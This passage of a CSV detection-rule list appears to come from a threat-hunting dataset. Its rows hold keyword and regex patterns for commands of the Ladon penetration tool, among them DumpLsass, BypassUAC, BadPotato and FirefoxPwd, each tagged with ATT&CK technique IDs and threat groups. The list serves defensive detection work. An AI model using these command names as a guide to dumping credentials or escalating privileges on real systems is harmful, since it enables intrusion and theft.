- Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon AutoRun*",".{0,1000}Ladon\sAutoRun.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon BadPotato*",".{0,1000}Ladon\sBadPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon BypassUAC*",".{0,1000}Ladon\sBypassUAC.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon CheckDoor*",".{0,1000}Ladon\sCheckDoor.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon Clslog*",".{0,1000}Ladon\sClslog.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon CmdDll *",".{0,1000}Ladon\sCmdDll\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon cmdline*",".{0,1000}Ladon\scmdline.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon CVE-*",".{0,1000}Ladon\sCVE\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon DirList*",".{0,1000}Ladon\sDirList.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon DraytekExp*",".{0,1000}Ladon\sDraytekExp.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon DumpLsass*",".{0,1000}Ladon\sDumpLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon EnableDotNet*",".{0,1000}Ladon\sEnableDotNet.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon EnumProcess*",".{0,1000}Ladon\sEnumProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon EnumShare*",".{0,1000}Ladon\sEnumShare.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon Exploit*",".{0,1000}Ladon\sExploit.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon FindIP *",".{0,1000}Ladon\sFindIP\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon FirefoxCookie*",".{0,1000}Ladon\sFirefoxCookie.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon FirefoxHistory*",".{0,1000}Ladon\sFirefoxHistory.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon FirefoxPwd*",".{0,1000}Ladon\sFirefoxPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon ForExec *",".{0,1000}Ladon\sForExec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
